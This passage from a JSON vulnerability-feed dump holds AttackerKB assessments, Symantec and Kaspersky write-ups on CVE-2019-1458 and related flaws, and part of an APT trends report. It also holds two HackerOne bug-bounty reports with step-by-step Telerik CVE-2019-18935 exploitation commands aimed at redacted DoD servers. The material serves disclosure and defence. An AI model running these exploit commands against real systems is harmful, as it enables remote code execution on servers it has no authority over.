CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that lead to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if your interested). However this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. In essence there is a Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), which was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which then can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-24T00:00:00", "published": "2019-12-10T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "type": "attackerkb", "title": "CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-29T00:32:41", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n", "modified": "2020-10-22T00:00:00", "published": "2020-10-16T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-22T06:10:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n", "modified": "2020-10-13T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:10:34", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "description": "Aka \u2018Microsoft Exchange Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-17117, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 12, 2021 7:07pm UTC reported:\n\nThis is vulnerability is a bypass for the patch issued for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875>). The vulnerability was also identified and analyzed by Steven Seeley. The patch can be bypassed using call operators as described in Seeley\u2019s blog [Making Clouds Rain RCE in Office 365](<https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html>).\n\nThe original vulnerability is a command injection vulnerability that results in OS commands being executed with SYSTEM level privileges on the Exchange server due to insufficient sanitization on a cmdlet invocation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-12-10T00:00:00", "id": "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "href": "https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132", "type": "attackerkb", "title": "CVE-2020-17132", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2020-08-13T18:53:44", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "modified": "2020-08-13T18:11:22", "published": "2020-07-02T08:13:07", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T17:56:52", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "modified": "2020-05-07T16:54:15", "published": "2020-04-03T14:48:45", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2019-12-11T16:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2019-1458"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-12-10T00:00:00", "published": "2019-12-10T00:00:00", "id": "SMNTC-111060", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111060", "type": "symantec", "title": "Microsoft Windows Win32k CVE-2019-1458 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2019-12-12T11:22:50", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader \u2013 parsing PE headers, handling imports/exports, etc. After that, a code execution is redirected to the entry point of the DLL \u2013 the DllEntryPoint function. The PE code then creates a new thread, which is an entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was the 0-day exploit because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to windows switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call that's used to find a dozen offsets needed to set up fake kernel GDI objects in the memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. Then a bunch of calls to CreateBitmap are performed, the addresses to which are leaked using a handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and an undocumented syscall NtUserMessageCall is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771) and it's important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then using a call to SetBitmapBits it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value for an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. In this particular attack sandbox solution can analyze URL/malicious payload in isolated environment and detect the EPROCESS token manipulation.", "modified": "2019-12-10T20:00:39", "published": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group&#x27;s interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker&#x27;s LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker&#x27;s activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn&#x27;t limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework&#x27;s components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker&#x27;s infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker&#x27;s origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven&#x27;t previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for &quot;conspiring to profit from computer intrusions targeting the video game industry&quot;, following cooperation between the US DoJ and the Malaysian government, including the Attorney General&#x27;s Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite &quot;white hat&quot; network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they &quot;carried out their hacking using specialized malware, such as malware that cyber-security experts named &#x27;PlugX/Fast&#x27;, &#x27;Winnti/Pasteboy&#x27;, &#x27;Shadowpad&#x27;, &#x27;Barlaiy/Poison Plug&#x27; and &#x27;Crosswalk/ProxIP'&quot;. The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim&#x27;s network, to disclose the actor&#x27;s tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom &amp; Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an 